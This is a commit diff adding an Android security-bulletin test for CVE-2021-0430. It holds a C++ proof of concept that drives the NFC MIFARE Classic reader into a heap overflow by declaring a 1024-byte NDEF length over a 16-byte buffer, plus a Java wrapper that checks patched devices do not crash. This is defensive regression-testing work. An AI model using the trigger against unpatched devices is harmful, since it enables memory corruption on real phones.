CTS test for Android Security b/178725766
Bug: 178725766
Bug: 179709872
Test: Ran the new testcase on android-10.0.0_r39 to test with/without patch
Change-Id: I4db3c0540d215b0536f90867a51872e9728ddaa1
(cherry picked from commit 7c086a408bd8800c719dfc58260684578ab84a10)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp
new file mode 100644
index 0000000..5cad1e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2021-0430",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
+
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp
new file mode 100644
index 0000000..947f46a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp
@@ -0,0 +1,87 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfc_int.h>
+#include <rw_int.h>
+
+#define RW_MFC_STATE_READ_NDEF 0x03
+#define RW_MFC_SUBSTATE_READ_BLOCK 0x03
+
+extern tRW_CB rw_cb;
+
+void GKI_freebuf(void*) {
+}
+
+void GKI_start_timer(uint8_t, int32_t, bool) {
+}
+
+void GKI_stop_timer(uint8_t) {
+}
+
+void cback(tRW_EVENT, tRW_DATA*) {
+}
+
+int main() {
+ tRW_MFC_CB* p_mfc = &rw_cb.tcb.mfc;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t selres = 1;
+ uint8_t uid[MFC_UID_LEN] = { 1 };
+ if (rw_mfc_select(selres, uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ p_mfc->state = RW_MFC_STATE_READ_NDEF;
+ p_mfc->substate = RW_MFC_SUBSTATE_READ_BLOCK;
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+
+ tNFC_CONN* p_data = (tNFC_CONN*) malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR*) malloc(sizeof(uint8_t) * 16);
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.status = NFC_STATUS_OK;
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ NFC_HDR* mfc_data = (NFC_HDR*) p_data->data.p_data;
+ mfc_data->len = 0x10;
+ mfc_data->offset = 0;
+ p_mfc->ndef_length = 1024;
+ p_mfc->p_ndef_buffer = (uint8_t*) malloc(sizeof(uint8_t) * 16);
+ if (!(p_mfc->p_ndef_buffer)) {
+ free(p_data->data.p_data);
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ rw_cb.p_cback = cback;
+
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_mfc->p_ndef_buffer);
+ free(p_data->data.p_data);
+ free(p_data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java
new file mode 100644
index 0000000..935b601
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java
@@ -0,0 +1,37 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0430 extends SecurityTestCase {
+
+ /**
+ * b/178725766
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2021-04")
+ @Test
+ public void testPocCVE_2021_0430() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0430", null, getDevice());
+ }
+}
